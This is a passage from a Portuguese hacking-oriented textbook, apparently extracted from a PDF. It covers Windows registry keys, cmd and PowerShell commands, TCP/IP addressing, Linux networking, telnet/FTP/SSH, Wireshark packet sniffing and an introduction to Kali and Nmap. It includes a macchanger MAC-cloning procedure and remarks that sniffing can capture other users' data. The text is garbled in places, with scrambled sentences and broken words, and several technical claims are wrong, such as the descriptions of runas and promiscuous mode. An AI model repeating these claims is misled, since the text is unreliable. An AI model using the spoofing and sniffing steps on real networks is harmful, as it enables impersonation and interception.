HKEY_CURRENT_CONFIG Essa chave também é um atalho (ou seja, não existe fisicamente, apenas aponta para outra área do registro), desta vez para HKEY_LOCAL_MACHINE\Config\xx, onde xx é o perfil de hardware estáúnico atualmente configurado. Como na maioria dos micros só que há um perfil de hardware configurado, normalmente essa chave aponta para HKEY_LOCAL_MACHINE\Config\0001. Você pode saber qual é o perfil de hardware que está sendo atualmente utilizado no sistema lendo o valor presente em HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Con figDB. HKEY_DYN_DATA Todas as configurações armazenadas nas chaves anteriores são estáticas, ou seja, são armazenadas em algum lugar do disco rígido (em geral nos arquivos System.dat e User.dat). A chave HKEY_DYN_DATA contém informações dinâmicas e que existem somente na sessão atual. Essas informações são lidas durante o boot da máquina e contém informações como a lista de dispositivos Plug and Play


1 37


instalados no micro (essas informações são armazenadas na subchave Config Manager\Enum). Essas informações ficam armazenadas em memória RAM e, portanto, são criadas a cada boot da máquina.

O Registro nas versões de 64 bits do Windows, O Registro nas versões de 64 bits do Windows XP e do Windows Server 2003, 7 está dividido em chaves de 32 bits e 64 bits. Mas se compararmos em sua estrutura não encontraremos diferenças significativas.

Muitas das chaves de 32 bits têm os mesmos nomes de suas correspondentes de 64 bits e vice-versa. A versão padrão de 64 bits do Editor do Registro inclusa nas versões de 64 bitsbits do em Windows XP, do Windows Server 2003 e7 exibe as chaves de 32 HKEY_LOCAL_MACHINE\Software\WOW6432. O suporte de 32 e de 64 bits coexiste dentro da chave WOW64 (HKEY_LOCAL_MACHINE\Software\WOW6432Node) HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE\Software


1 38


O item WOW64 do registro, está relacionado com: • HKEY_LOCAL_MACHINE\Software\Classes • HKEY_LOCAL_MACHINE\Software\COM3 • HKEY_LOCAL_MACHINE\Software\Ole •• HKEY_LOCAL_MACHINE HKEY_LOCAL_MACHINE\Software\EventSystem \Software\RPC

Ferramentas para edição do registro Existem ferramentas muito legais para manipulação do registro do Windows. Através dessas ferramentas você pode visualizar as linhas de registro que estão sendo utilizadas pelos programas em execução, os serviços do sistema as DLLs, pode limpar o registro manualmente, mais o que considero mais importante é o fato de podermos estudar o registro com mais tranquilidade, devido sua interface amigável, (Lembre-se, tudo que está rodando no sistema é importante).


1 39


Alguns comandos para execução de tarefas via prompt cmd.exe – (O mesmo que adicionar ou remover programas e appwiz.cpl componentes do Windows )

arp – (Exibe, adiciona e remove informações arp de dispositivos de rede) assoc – (O comando assoc exibe a associação de arquivo para cada um dos diferentes extensões de arquivo no computador) attrib – (O comando attrib permite ao usuário alterar as propriedades do arquivo) – (O comando bootcfg é um comando do Console de bootcfg.exe recuperação que permite ao usuário reconstruir, ver, e fazer alterações no arquivo Boot.ini)

cacls.exe – (Substituido por icacls.exe permite a visualização e modificações nas ACLs de um arquivo)


1 40


chcp.exe - (Exibe a página de código ativa)

cd e chdir – (Meios para se movimentar entre os diretórios no MS.DOS) cipher.exe – (Exibe ou altera a criptografia de diretórios [arquivos] em partição NTFS) convert – (Converte FAT para NTFS ex: / FS: NTFS Especifica os volumes a serem convertidos que para NTFS. compmgmt.msc – (Abre o gerenciador do computador, configurações do sistema, componentes etc.) cmd – (Abre a janela do prompt de comando) control.exe (Abre o painel de controle do Windows) defrag –( Desfragmenta o o disco especificado) deltree – (Comando usado para apagar arquivos e diretórios do computador permanentemente) dir – (O comando dir permite que você veja os arquivos disponíveis no diretório corrente ou em qualquer outro diretório) diskcopy – (O permite fazer cópia completa de um disco para outro) diskpart – (O comando diskpart é uma console de recuperação que permite ao usuário excluir e criar partições em seu PC)


1 41


doskey – (Permite ao usuário manter um histórico de comandos usados no computador) driverquery – (Permite a exibição e administração dos de drivers de dispositivo instalados endlocal – (Interrompe a localização das alterações de ambiente habilitado pelo comando setlocal) eventvwr.exe – (Abre a visualização de eventos do sistema) findstr – (Utilize para localizar arquivos específicos contendo uma determinada sequência de texto simples) fsutil – (Utilitário de linha de comando que pode ser usado para executar várias tarefas relacionadas com a tabela de alocação de arquivos (FAT) e sistemas de arquivos NTFS) ftype – (Exibe e modifica tipos de arquivos) getmac – (Ativa a ferramenta de administração para exibir o endereço MAC dos adaptadores de rede no sistema)

gpedit.msc. (Chama o editor de política de grupo local e permite ajustar políticas que afetam a máquina local) gpupdate – (Atualiza as diretivas da política de grupos)


1 42


hostname – (Mostrar o nome da máquina) I inetcpl.cpl – (Exibe o Internet Explorer e permite adequação nas configurações) ipconfig.exe – (Mostra as configurações e endereço de rede) lodctr – (Atualiza valores de registro) logoff – (Permite fazer logof de um usuário pela linha de comando, seja local ou remoto) Logman – (Gerencia e agenda contador de desempenho logs de eventos, rastreamento em sistemas locais e remotos) md ou mkdir – (Permite criação de diretórios no MS-DOS) mountvol – (Cria, exclui ou lista um volumes e pontos de montagem) msinfo32.exe – (Exibe informações sobre hardware e configurações avançadas de software) msra.exe – (Abre a assistência remota para oferecer ou pedir ajuda a um amigo através da internet) netsh – (Permite a realização de alterações nas configurações de seu dispositivo de rede tais como a mudança de um endereço dinâmico para um endereço estático ou alterar o endereço IP) netstat – (Exibe o protocolo TCP/IP, estatísticas e informações sobre as conexões) nslookup – (Permite a procura de um endereço IP de um determinado domínio ou host em uma rede e faz consulta reversa)


1 43


pathping – (É semelhante ao tracert quando mapeia determinada rota de um pacote entre a srcem e destino e tem a capacidade de localizar pontos com latência de rede e perda de pacotes) perfmon.exe – (Abre o monitor de desempenho em computadores locais ou remotos) popd – (Muda para o caminho do diretório ou da rede armazenada pelo comando pushd) rd / rmdir – (Remove diretórios vazios no MS-DOS) regedit.exe - (Abre o editor do registro do Windows) rstrui.exe - (Abre a restauração do sistema) runas – (Permite a execução de programas em um computador remoto) secedit – (Configura e analisa a segurança do sistema) taskmgr.exe – (Abre o gerenciador de processos) taskkill – (Usado para matar processos a partir do prompt do MS-DOS) tasklist – (Esta a lista de processos em execução em cada máquina local ou remoto) waitfor – (Sincroniza vários computadores em uma rede) whoami – (Retorna nome de domínio, nome do computador, nome de usuário logado) wscui.cpl – (Exibe a tela de configurações de segurança)


1 44


xcopy – (Comando de cópia com recursos adicionais) at – (Planeja a execução de comandos e programas em um computador, em uma data e hora especificadas)

Comandos de rede no Windows *Desligar pela Rede shutdown -s /C /Y /T:30 "msg" \\Estação Opções: "-s" = Ordena o desligamento do sistema "/C" = Fechar os programas em aberto "/T:xx" = Estabelece um tempo para desligar o sistema "/Y" = Ordena seja salvo os adocumentos em edição antes de desligar ""msg"" = Umaque mensagem para rede "\\Estação" = Nome do computador que será desligado

*Mapear Unidade Pela Rede NET USE Z: \\SERVIDOR\DISCO_C Opções: Z: - É a unidade que se deseja mapear \\Servidor\ - Computador hospedeiro


1 45


Disco_C - Refere-se ao compartilhamento que se deseja mapear

Comando úteis para serem executados via executar Windows” + “R”. Irá exibir a janela executar

Citarei abaixo apenas o comando e o programa a que o mesmo se refere e não exatamente todas as suas funcionalidades, apenas em alguns casos que eu considere de maior relevância para nosso propósito nessa obra.

APPWIZ.CPL : O mesmo que adicionar remover programas no painel de controle;


1 46


AZMAN.MSC : Gerenciador de autorizações


1 47


CERTMGR.MSC : Certificados para o usuário atual

CLICONFG : Configuração dos clientes SQL


1 48


COLLAB.CPL : Minha vizinhança imediata


1 49


COMEXP.MSC : Serviços e componente, Idem para DCOMCNFG


1 50


COMPMGMT.MSC : Gerenciamento do computador


1 51


COMPUTERDEFAULTS : Programas padrão


1 52


INTL.CPL : Opções regionais


1 53


MAIN.CPL : Propriedades do mouse e dispositivos apontadores


1 54


NETPLWIZ : Controle de usuários e acessos


1 55


CREDWIZ : ferramenta de backup e de restauração de senhas dos usuários


1 56


DESK.CPL : Configurações de exibição


1 57


DEVMGMT.MSC : Gerenciador de periféricos


1 58


DXDIAG : Ferramenta de diagnóstico DirectX

EVENTVWR.MSC : Visualizador de eventos


1 59


FSMGMT.MSC : Pastas compartilhadas


1 60


GPEDIT.MSC : Editor de estratégias e políticas de grupo


1 61


ISCSICPL: Configuração do iniciador ICSI Microsoft


1 62



1 63


JOY.CPL : Controlador de jogos

LPKSETUP : instalação e remoção dos idiomas de exibição


1 64


LUSRMGR.MSC : Editor dos usuários e grupos locais


1 65


MDSCHED : Ferramenta de diagnósticos da memória


1 66


MMC : Novo console vazio

MMSYS.CPL : Configurações de som


1 67


MOBSYNC: Centro de sincronização


1 68


MSCONFIG: Configuração do sistema


1 69


NAPCLCFG.MSC : Configuração do cliente NAP

ODBCAD32 : Administrador de fonte de dados ODBC


1 70


PERFMON.MSC : Monitor de confiabilidade e de desempenho Windows


1 71


POWERCFG.CPL : Gerenciador de modos de alimentação


1 72


REGEDIT ou REGEDT32 : Editores de registro

REKEYWIZ : Gerenciador de certificados de criptografia de arquivos


1 73


RSOP.MSC : Estratégia resultante


1 74


SECPOL.MSC: Configurações de segurança local


1 75


SERVICES.MSC : Gerenciador de serviços


1 76


SLUI : Assistente de ativação do Windows


1 77


SYSDM.CPL : Propriedades do sistema


1 78


SYSKEY : Proteção do banco de dados das contas Windows


1 79


TABLETPC.CPL : Configurações para o Tablet pc


1 80


TASKSCHD.MSC: Agendamento de tarefas


1 81


TIMEDATE.CPL : Configurações da hora e da data


1 82


TPM.MSC : Ferramenta de gestão do módulo de plataforma segura no computador local


1 83


WMIMGMT.MSC: Gerência de infraestrutura

WSCUI.CPL : Central de segurança Windows


1 84


MRT : Utilitário de remoção de malwares


1 85


MSDT : Ferramenta de diagnósticos e suporte da Microsoft


1 86


MSRA: Assistência remota do Windows


1 87


MSTSC: ferramenta de conexão da assistência remota


1 88


SIGVERIF : Ferramenta de verificação de assinaturas de arquivos


1 89


SNIPPINGTOOL : Ferramenta de captura de tela

CLEANMGR : Ferramenta de limpeza do disco

DISKMGMT.MSC : Gerenciador de discos


1 90


DISKPART : Ferramenta de particionamento


1 91


NCPA.CPL : Conexões da rede

FIREWALL.CPL : Firewall do Windows


1 92


INETCPL.CPL : Propriedades da internet


1 93


Um comando que também é super importante é o SHUTDOWN para desliga o sistema e SHUTDOWN -A para interromper a desconexão.


1 94


GETMAC: Visualizar o endewreço MAC da NIC

C:\> ipconfig /release: Limpar o cache DHCP C:\> ipconfig /renew: Renovar o endereço IP da NIC em DHCP C:\> net view: Exibir a lista de máquinas na rede C:\> net share: Exibir Máquinas e os compartilhamentos C:\> net use: Comando de administração de usuários em shell É possível também usar o comando "net use" para mapear compartilhamentos de rede de outras máquinas viaatribuída linha de ao comando. Nesse caso, você deve especificar a letra que será compartilhamento, seguida pelo "\\servidor\compartilhamento", como em:

C:\> net use G: \\maquina\X: Mapeia compartilhamento X


1 95


C:\> net use G: /delete: Desconectar um compartilhamento Lembre-se que: Ao contrário do Linux, o prompt do Windows não é case sensitive, portanto, tanto faz se você digita "net use ou NET USE, e isso é valido para todos os comandos.

Windows PowerShell O Windows PowerShell é um shell de linha de comando e linguagem de script, baseado em tarefas. Ele foi criado preferencialmente para a administração de sistemas. Por ser criado em uma estrutura .NET, ele ajuda em muito os profissionais de TI a controlar e automatizar a administração do sistema operacional e os programas que são executados em Windows. Os comandos incorporados ao PowerShell são chamados de cmdlets e permitem a gerência dos computadores pela linha de comando. O Windows PowerShel inclui recursos de: Cmdlets para a execução de tarefas comuns de administração de sistema, como gerenciamento de registro, serviços, processos e logs de eventos. Uma linguagem de script baseada em tarefas e suporte para scripts existentes e ferramentas de linha de comando. Design consistente e, (Palavras da MIcrosoft), Como os cmdlets e os repositórios de dados do sistema usam sintaxes comuns e convenções de nomenclatura, os dados podem ser compartilhados facilmente e a saída de um cmdlet pode ser usada como a entrada para outro cmdlet, sem a necessidade de reformatação ou manipulação.


1 96


Simplificada, a navegação baseada em comandos do sistema operacional permite aos usuários navegar pelo registro e outros repositórios de dados usando as mesmas técnicas usadas para navegar pelo sistema de arquivos. Recursos de manipulação de objetos potentes. Objetos que podem ser diretamente manipulados ou enviados para outras ferramentas ou bancos de dados. Interface extensível. Provedores de software independentes e desenvolvedores empresariais podem criar ferramentas padronizadas e utilitários para administrar seus softwares. (Fonte: Site da Microsoft, acessado em 24/05/2013)

Conceitos básicos do Windows PowerShell Segundo a própria Microsoft, Windows PowerShell, deve usar uma abordagem diferente para exibir as informações, já que não possui menus ou sistemas gráficos para auxiliarem o usuário, assim como o Explorer etc. Será necessário saber, ou aprender apenas os nomes dos comandos antes de usá-los. O Windows PowerShell foi projetado para aproveitar o conhecimento histórico dos usuários sobre as CLIs. Neste capítulo, falaremos sobre algumas ferramentas e conceitos básicos que podem ser usados para um rápido aprendizado do Windows PowerShell que Incluem: O Get-Command Comandos do Cmd.exe e do UNIX Comandos Externos Tab-Completion


1 97


Get-Help

get-command

Com o comando get-command você irá descobrir todas os cmdlet e escolher o ideal para a realização de uma tarefa em específico, você pode aprender mais sobre ele usando o cmdlet Get-Help.


1 98


get-service


1 99


Com o comando acima, pode-se exibir o serviços em execução. Bem, podemos afirmar que o Power shell veio para facilitar a vida de que gosta de administrar via linha de comandos. por está fora do escopo dessa obra, não nos aprofundaremos, mais o leitor dessa pode acompanhar os artigos que sempre escrevo para meu site www.clubedohacker.com.br onde apresento esse tema também em uma área exclusiva que estou criando apenas para os leitores dessa obra. cadastre e solicite a liberação de acesso ao conteúdo exclusivo para você.

Apenas um lembrete: Os comandos binários nativos do Windows PowerShell, conhecidos como cmdlets (pronuncia-se command-lets), podem ser estendidos por cmdlets criados por você e adicionados ao Windows PowerShell com o uso de snap-ins. Os snap-ins do Windows PowerShell são compilados, assim como as ferramentas binárias de qualquer outra interface e você pode utilizá-los para adicionar provedores do Windows PowerShell ao shell, assim como novos cmdlets. Comandos conhecidos da cmd.exe e Linux também são aceitos no power shell por exemplo: dir, mount, cat, cd, rm, rmdir sort, chdir, mv, cp, pwd, tee, del, ps, kill, echo e muitos outros, participe de sua área exclusiva no clubedohacker.com.br para conhecer todo o potencial do PowerShell ou no site da Microsoft.


2 00


A PILHA TCP/IP Precisamos entender um pouco sobre o modelo de comunicação mais utilizado pela Internet e conseguentemente pelos computadores. Tenho plena consiencia que esse nao é um livro sobre redes e protocolos. Mas como poderemos tratar de um tema tão importante sem incluir esse modelo, sabendo que nao haverá outro meio de comunicação entre os computadores a nao ser atraves de seus protocolos de comunicação? Pois bem, incluir esse tópico sobre introdução ao conjunto de protocolos TCP/IP assim como o fiz introduzindo os dois sistemas operacionais mais utilizados, Windows e Linux. Mas citarei apenas o essencial para o entendimento de nossa proposta nesse livro e se você já estodou TCP/IP você pular esse tópico tranquilamento.

O TCP/IP “Transmission Control Protocol/Internet Protocol” foi criado pelo Departamento de Defesa dos Estados Unidos (DoD – Department of Defense) para assegurar e preservar a integridade dos dados transmitidos e manter as comunicações em caso de eventuais guerras. Jamais poderimaos pensar que ele se tornaria o modelo de referência para o funcionamento da rede mundial de computadores. Tambem não dava pra prever que um adolescente de 14 anos morando do outro lado do planeta deteria conhecimentos suficientes para


2 01


manipular essa pilha sem nunca ter passando em frente a uma Universidade. Pois bem, para que os computadores de uma rede possam trocar informações entre si é necessário que todos os computadores adotem as mesmas regras para o envio e o recebimento das informações.

Modelo de referência TCP/IP: O Modelo TCP/IP é dividido em camadas num total de 4 de acordo com a tabela abaixo e em cada camada residem os protocolos que por sua vez iram trabalhar atraves das portas de comunicação do sistremas " system calls:

Diferença entre o protocolo TCP e UDP O TCP é um protocolo orientado a conexão porque ele pega um bloco grande de informações da camada superior "aplicação" e quebra em várias partes, dando srcem ao que se chama de segmentos.


2 02


Já o UDP não coloca sequência em seus segmentos e não se importa com a ordem de chegada dos mesmos na maquina receptora. Como isso o UDP sé torna mais rápido que o TCP e é muito útil quando se está utilizando VoIP etc.

Protocolo IP: Pertencente a camada Internet do modelo TCP/IP o protocolo IP é soberano em relação aos outros protocolos encontrados nesta camada. Ou seja, os outros protocolos dessa camada serve para dar suporte ao IP em algumas tarefas.

O Endereçamento IP: O endereco IP é um identificador numérico de 32 bits que é associado em cada máquina na rede IP. Um endereço IP é um endereço de software não um endereço de hardware. Um endereço de hardware ou indereço MAC está contido na placa de redes e é usado para encontrar máquinas em uma rede local. Já o endereço IP permite que uma máquina em uma rede se comunique com outra em outra rede ou na mesma rede.

Endereço de Broadcast – Este endereço é usado pelas aplicações e máquinas na rede para enviar informações à todos os equipamentos ligda rede. Por exemplo: Se você tem uma máquina ligada em rede com o IP 192.168.0.10 todas as máquinas ligadas a mesma rede terá um endereço unico de broadcast que será


2 03


192.168.0.255.

Através do comando arp -a você pode visializar e confirmar o endereço de broadcast, basta ver todos os endereçamentos que terminam com 255 em todas as placas de rede.

Endereço de Multicast – Envia informação para várias máquinas em redes diferentes. Os endereços de Multicast são usados pelos protocolos de roteamento.

Endereço de Unicast – Serve para enviar informação à uma única máquina na rede.

O esquema de endereçamento IP: Um endereço IP é composto de 32 bits de informação. Estes 32 bits são divididos em 4 setores referidos como octeto ou bytes. O endereço IP de 32-bit é um endereço


2 04


estruturado hierárquicamente para que possa suportar um grande número de endereços. Como assim? O endereço IP de 32 bits, portanto, se caucularmos, 2 32 = 4.294.967.296. Mas mesmo assim é necessário que ele seja dividido por classes. Se não fosse a estrutura de divisão hierarquica do enderaçamento IP todos os roteadores na internet teriam que guardar os endereços de todas as máquinas na Internet.

Classes de endereços IP: As classes baseiam-se no tamanho das redes e são divididas em endereços de rede e endereços de máquina. Existem 5 tipos de classes que serão serão mostradas na tabela abaixo:

Para cada classe foi reservado uma certa quantidade de endereço os intervalso de endreçamento para cada classe são:


2 05


Endereços reservados: Também existem endereços que são reservados, ou seja, não podem ser utilizados: São os endereços 0.0.0.0, 128.0.0.0, 191.255.0.0, 192.0.0.0, 223.255.255.0, 255.255.255.255 são reservadas, e também o 127.0.0.1 que está reservado para loopback.

Endereços privados: Dentro das classes de endereços IP que citamos aqui, existem ainda as classes de endereços Privados. Os endereços privados são aqueles que não são roteáveis pela Internet e são exclusivamente usados nas redes privadas como a minha e a sua rede local.

Serviços de Rede - Configurando uma rede Descobrindo o modelo da placa de rede: # lspci Verificando se há o módulo para esta interface: # ls

/lib/modules/`uname –r`/kernel/drivers/net ww w. cl ub ed oh ack er .c om .b r

2 06


Caso precise levantar o módulo, digite o comando: # modprobe

[módulo] Para verificar se o módulo está carregado, digite: # lsmod | grep

[módulo] Informações de endereçamento IP: # ifconfig Eliminando as configurações de rede: # ifconfig eth0 down Exibindo a configuração: # ifconfig Restaurando o serviço de rede: # ifconfig eth0 up

Configurando o IP, Máscara e Broadcast: # ifconfig eth0 192.168.0.x netmask 255.255.255.0 broadcast 192.168.0.255 Verificando se há conectividade: # ping 192.168.0.x O ifconfig é dinâmico, para que as configurações de endereçamento IP sejam carregadas durante o boot. O arquivo de configuração é o interfaces que pode ser editado com o comando : # vi

/etc/network/interfaces Verificar daemon networking, para garantir boot do serviço: # ls

/etc/rcS.d


2 07


Configurando o nome da máquina:# vi /etc/hostname Configurando o nome da máquina e o nome de domínio: # vi /etc/hosts Verificar domínio que está sendo utilizado: # hostname -f Roteamento: # route Configurando o roteamento: # route add default gw 192.168.0.1

Comandos do TELNET O telnet: Permite o acesso remoto a uma máquina, fazendo a simulação de um terminal virtual. Exemplo: telnet (depois de aberta a janela de telnet deve-se especificar a máquina remota) ou telnet nome.da.máquina.com.br login: Permite o acesso de usuários devidamente credenciados a máquina especificada em telnet. Exemplo: login adonel Logout: Faz a desconexão entre o usuário e a máquina remota. Exemplo: logout Dir: Exibe o diretório da máquina conectada via telnet Exemplo: dir Pwd: Exibe o diretório atual. Exemplo: pwd cd: Muda de diretório (cd = change directory) Exemplos: cd / (volta ao diretório raiz), cd .. (volta apenas um diretório), ou cd nome_do_dir1/nome_do_dir2/... (avança do ponto em que está para o diretório especificado) ou cd /nome_do_dir1/nome_do_dir2/... (avança


2 08


a partir do diretório raiz para o diretório especificado, independentemente do diretório em que estiver)

mkdir: Cria um novo diretório (mkdir = make directory) Exemplo: mkdir no me_do_diretório rmdir: Apaga um diretório (rmdir = remove directory) Exemplo: rmdir nome_dor_diretório cp: Copia um arquivo de um diretório para outro (ou para o mesmo diretório), permitindo também, a mudança de nome na criação do novo arquivo (cp = copy). Exemplo: cp caminho_srcem/nome_do_arquivo caminho_destino/nome_do_novo_arquivo mv: Move um arquivo de um diretório para outro (ou para o mesmo), permitindo também, a mudança de nome na criação do novo arquivo (mv = move). Formato: mv caminho_srcem/nome_do_arquivo caminho_destino/nome_do_arquivo rm: Apaga um arquivo de um diretório especificado (rm = remove). Exemplo: rm caminho_srcem/nome_do_arquivo caminho_destino/nome_do_arquivo cls: Limpa a tela ( cls = clear screen) Exemplo: cls who: Exibe a relação de usuários on-line no sistema. Exemplo: who passwd: Permite a mudança de senha do usuário (passwd = password = senha). Exemplo: passwd [ENTER] old password: (digite a senha que você utilizou para entrar no sistema) new password: (digite a nova senha) retype password: (digite novamente a senha para conferência)


2 09


Comandos do TELNET e FTP FTP: Programa para transferência de arquivos (ftp = file transfer protocol) Comandos do telnet aceitos pelo ftp: pwd, cd, mkdir, rmdir. Comandos específicos do ftp:

open: para fazer a conexão a máquina remota. Exemplo: open nome_da_máquina Ou open xxx.xxx.xxx.xxx (onde xxx representa o endereço Ip da máquina remota) close: Faz a desconexão da máquina remota. Exemplo: close quit: Abandona o modo ftp. Exemplo: quit Alteraasc o formato de transferência de arquivos para o modo ASCII. asc: Exemplo:

Bin: Altera o formato de transferência de arquivos para o modo BINÁRIO. Exemplo: bin Dele: Apaga um arquivo do diretório atual. Exemplo: dele nome_do_arquivo Put: Transfere um arquivo de um diretório da máquina local para outro diretório na remota (put = colocar), possibilitando a mudança de nome do arquivo transferido. Exemplo: put caminho_origem/nome_do_arquivo caminho_destino/nome_do_arquivo

get: Transfere um arquivo de um diretório da máquina remota para outro diretório na local ( get = pegar), possibilitando a mudança de nome do arquivo transferido.


2 10


Exemplo: get caminho_srcem/nome_do_arquivo caminho_destino/nome_do_novo_arquivo

mput: O mesmo que put, porém para vários arquivos ao mesmo tempo. Por exemplo, arquivos com a mesma extensão ou mesmo nome inicial. Utilizado com o coringa * ( mput = multiple put). mget: O mesmo que get, porém para vários arquivos. Por exemplo. Seguir o mesmo procedimento do mput (mget = multiple get). Comandos para conexão via SSH Conexão no servidor SSH, através de uma das formas listadas abaixo: #ssh #ssh @ #ssh -l $ ssh [email protected] - A partir daí, você pode acessar a máquina remotamente a partir de outras máquinas Linux usando o comando "ssh", seguido do login usuário (na máquina remota) e o endereço, como o indicado acima.

Outras opções para trabalhar com SSH Com o ssh você pode executar comandos remotamente, onde o usuário faz o login via ssh e depois que o resultado é exibido, a conexão é fechada com o servidor. Ex: #ssh -l tux 192.168.0.18 du -hs /usr - Com esse comando você estamos consultando a quantidade de espaço ocupado em /usr do servidor ssh.

Fazendo copias


2 11


Também é possível fazer cópias de arquivos ou diretórios remotamente através do protocolo SSH, basta utilizar o o comando scp. Ex: # scp @:/ -> nesse exemplo estamos utilizando <> somente para entendimento, mas não fazer parte do comando para fazer download de arquivos do servidor SSH.

Fazendo upload # scp @:/ Copiando diretórios # scp -r @:/ Fazendo upload no diretórios no servidor SSH # scp -r @:/
# scp -r [email protected]:/tmp /root Exemplo: Para fazer upload do arquivo /tmp/teste20 que está na máquina local para o servidor 192.168.0.12 no diretório /home/adonel no servidor, utilizando o usuário “adonel” login: # scp /tmp/teste20

[email protected]:/home/adonel

Um pouco mais sobre os pacotes em rede Para aprender um pouco mais sobre a circulação dos pacotes na rede, você irá precisar do auxilio dos analisadores de protocolos. Lembre-se que, se optar por utilizar um analisador de protocolos como o Wireshark


2 12


por exemplo, alem de poder analisar os pacotes através da rede local, também poderá capturar dados de usuários, pois a maioria dessas ferramentas funcionam também como sniffer. De qualquer forma você vai precisar deter alguns conhecimentos e o primeiro deles é colocar sua placa de rede em modo promiscuo, coisa que o Wireshark faz com maestria, mais se deseja fazer isso manualmente também é muito simples. Vamos mostrar as duas formas para que você descida como será melhor em cada caso.

Analisador de protocolos Wireshark Wireshark é tranquilamente um dos melhores analisadores de protocolos de rede que existe. É uma excelente ferramenta para inspecionar redes, desenvolver protocolos e também pode e deve ser utilizada para fins educacionais ou mesmo para fins ilícitos.


2 13


A primeira coisa que você deve decidir é se ele utilizar a captura com a placa de rede em modo promiscuo ou normal. Se você optar pelo modo tradicional da placa de rede você não irá analisar nada na rede, apenas os pacotes de interesse da maquina local serão analisados. Já se você optar pelo modo promiscuo, sua maquina vira uma espécie de gateway na rede e todos os pacotes dentro do segmento serão analisados.


2 14


A segunda é a interface de rede que deve ser rastreada. clique em Capture, depois em interfaces e escolha a placa de redes que desejar monitorar o fluxo.


2 15


Escolha uma interface e clique no botão start que o rastreamento começa e a janela principal do Wireshark passa a mostrar uma o movimento dos pacotes na rede.

Os pacotes começam a serem capturados imediatamente, sempre na ordem de seus protocolos dentro da pilha TCP/IP. O primeiro pacote foi gerado pela minha máquina para enviar em broadcast que nada mais é que uma mensagem do ARP que é o Protocolo de Resolução de Endereço MAC para IP na rede local. Nesse caso o browser pediu um domínio (no caso, clubedohacker.com.br) que está fora da rede local, ou seja, minha máquina precisa fazer uma conexão com um servidor de páginas localizado numa outra rede e precisa de um autorização que só pode ser concedida pelo roteador da minha rede com o endereço IP é 198.168.0.1.


2 16


Para poder falar com esta máquina, a placa Ethernet do meu computador precisou do endereço MAC da placa Ethernet do roteador já que ela não tem essa informação ela pergunta, colocando na rede um pacote de broadcast. O browser por sua vez, recebeu o nome de um domínio chamado de clubedohacker.com.br, mas ele não sabe quem é nem qual seu endereço IP. Nesse caso a maquina local necessita utilizar algum serviço de tradução que esteja disponível e transforme nomes de domínio em endereços IP. Aí entra em ação um especialista no assunto. Os servidores DNS. Analisando um pacote você terá três painéis distintos, o painel superior contém a lista dos pacotes capturados e os outros dois contém as informações sobre o pacote que irá descrever o seguinte roteiro. O protocolo TCP (Transmission Control Protocol - Protocolo de Controle de Transmissão) é acionado pelo aplicativo que, no nosso exemplo, é o browser. O browser fornece algumas informações para que o TCP possa montar seu pacote. Este primeiro pacote é repassado para o protocolo IP (Internet Protocol) - responsável pelo roteamento, isto. Nesse ponto já esta definida a srcem e o destino do pacote. O IP adiciona as informações que são da sua competência e empacota os dados recebidos juntamente as informações que ele mesmo adicionou. O IP irá transferir este novo pacote para a placa de rede que faz um novo embrulho adicionando seu endereço MAC e o MAC do destino. Clicando no título Transmission Control Protocol no wireshark você vai observar a forma decimal do pacote.


2 17


Clique no título Internet Protocol e observe no painel inferior que o miolo do pacote é destacada. Bem, existem mais de uma dezena de opções para você trabalhar com wireshark.

Clonando o endereço MAC Essa tarefa é muito simples para quem utiliza Linux, basta seguir o roteiro abaixo:

#macchanger --m (endereço mac que deseja e a interface de rede)


2 18


exemplo: #macchanger --m SI:FU:SO:00:00:00 eth0 (Onde eth0 é a interface de rede que será clonada) veja as imagens abaixo.

Aqui nós derrubamos a placa de rede e clonamos o endereço MAC. O próximo passo será levantar a placa e os serviços.


2 19


Aqui vemos que a placa clonada já esta funcionando corretamente. Agora é só utilizar o programa de sua preferência para capturar os pacotes ou mesmo utilizar a rede com o endereço MAC clonado. Lembramos que há fortes implicações legais se você utilizar qualquer destas técnicas para algo ilícito, como se passar por outra pessoa, etc. Se utilizar essas técnicas dentro da empresa sem as devidas autorizações por escrito você pode inclusive ser demitido por justa causa.

As Ferramentas do Backtrack Linux e Kali Como já sabemos o conceito de analise de vulnerabilidades e as técnicas de forma conceitual, alguns serviços de redes, as informações necessárias sobre uma boa analise de vulnerabilidades conhecemos um pouco mais sobre o sistema Linux e mais objetivamente o


2 20


Backtrack, bem como o Kali! Ta na hora de conhecer o poderoso arsenal existente neles. Não irei apenas listar as ferramentas disponíveis no, irei percorrer todos os diretórios dentro do diretório pentest do Backtrack, (No Kali não será necessário percorrer os diretórios) descrever cada uma das ferramentas mais importantes e ensinar a utilização delas. Na maioria delas irei ensinar sua utilização e os comandos para sua manipulação.

Dentro do diretório pentest no Backtrack como se pode ver na tela acima você irá encontrar 24 diretórios que darão acesso a mais algumas dezenas de diretórios separados por assunto. Como não sou eu quem vai determinar o grau de importância de cada um,


2 21


considerando que todas as ferramentas aqui são muito importantes, dependendo do contexto. Portanto! eu considero que você deve determinar o grau de importância de cada uma de acordo com a tarefa que pretende executar. Sendo assim, começarei e terminarei essa obra sem nenhuma ordem de diretórios ou ferramenta. Procurarei mostrar e ensinar a utilização as principais dentre as mais de 300 ferramentas disponíveis.

Nmap: O canivete suíço

Introdução ao NMAP O Nmap é a ferramenta de verificação mais popular usado na Internet. Criado por por Fyodor (http://www.insecure.org o nmap tem sido ww w. cl ub ed oh ack er .c om .b r

2 22


utilizado por milhares de profissionais pelo mundo inteiro. O site do nmap: www.nmap.org é a fonte oficial do namp. No site oficial você pode baixar o código fonte e os binários do nmap e do zenmap. O código fonte é distribuído em arquivos .tar comprimidos como gzip e bzip2, e os binários estão disponíveis para Linux, Windows, MAC OS X e imagem de disco .dmg. Não é minha pretensão fazer desse tópico um guia de referencia sobre NMAP, se você quer conhecer tudo sobre essa maravilhosa ferramenta de redes eu aconselho a leitura do livro Exame de Redes com NMAP (do mesmo autor da ferramenta e lançado no Brasil pela Editora Ciência Moderna) www.lcm.com.br inclusive eu aconselho que o faça pois muitos administradores de sistemas e redes que eu conheço já fizeram isso com o objetivo de tornar mais fácil suas tarefas de inventário, gerenciamento de agenda de atualizações etc. Você não pode deixar de estudar também as RFC´s 793, 792, 1122, 786 e as demais referente a pilha TCP/IP disponíveis em http://www.rfc-editor.org/ . O NMAP usa pacotes crus de IP para determinar quais maquinas estão disponíveis na rede, quais serviços estão sendo oferecidos, quais os sistemas operacionais, quais os tipos de filtros de segurança estão sendo aplicados etc.


2 23


